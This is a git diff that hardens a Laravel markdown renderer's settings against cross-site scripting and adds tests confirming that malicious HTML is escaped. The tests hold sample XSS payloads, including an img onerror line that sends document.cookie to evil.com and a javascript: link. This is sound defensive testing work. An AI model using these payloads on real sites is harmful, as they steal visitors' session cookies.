diff --git a/config/markdown.php b/config/markdown.php
index 16fb74a..98666ab 100644
--- a/config/markdown.php
+++ b/config/markdown.php
@@ -33,7 +33,10 @@ return [
      *
      * More info: https://spatie.be/docs/laravel-markdown/v1/using-the-blade-component/passing-options-to-commonmark
      */
-    'commonmark_options' => [],
+    'commonmark_options' => [
+        'html_input' => 'escape',
+        'allow_unsafe_links' => false,
+    ],
 
     /*
      * Rendering markdown to HTML can be resource intensive. By default
diff --git a/tests/Feature/MarkdownXssProtectionTest.php b/tests/Feature/MarkdownXssProtectionTest.php
new file mode 100644
index 0000000..eccce2f
--- /dev/null
+++ b/tests/Feature/MarkdownXssProtectionTest.php
@@ -0,0 +1,40 @@
+<?php
+
+use Spatie\LaravelMarkdown\MarkdownRenderer;
+
+it('escapes script tags in markdown output', function () {
+    $renderer = app(MarkdownRenderer::class);
+
+    $html = $renderer->toHtml('<script>alert("xss")</script>');
+
+    expect($html)->not->toContain('<script>');
+    expect($html)->toContain('&lt;script&gt;');
+});
+
+it('escapes img onerror XSS payloads in markdown output', function () {
+    $renderer = app(MarkdownRenderer::class);
+
+    $html = $renderer->toHtml('<img src=x onerror="fetch(\'https://evil.com/\'+document.cookie)">');
+
+    expect($html)->not->toContain('<img ');
+    expect($html)->toContain('&lt;img');
+});
+
+it('blocks javascript: protocol links in markdown output', function () {
+    $renderer = app(MarkdownRenderer::class);
+
+    $html = $renderer->toHtml('[click me](javascript:alert("xss"))');
+
+    expect($html)->not->toContain('javascript:');
+});
+
+it('still renders valid markdown formatting', function () {
+    $renderer = app(MarkdownRenderer::class);
+
+    $html = $renderer->toHtml("**Bold text** and [a link](https://example.com)\n\n- Item 1\n- Item 2");
+
+    expect($html)->toContain('<strong>Bold text</strong>');
+    expect($html)->toContain('<a href="https://example.com">a link</a>');
+    expect($html)->toContain('<li>Item 1</li>');
+    expect($html)->toContain('<li>Item 2</li>');
+});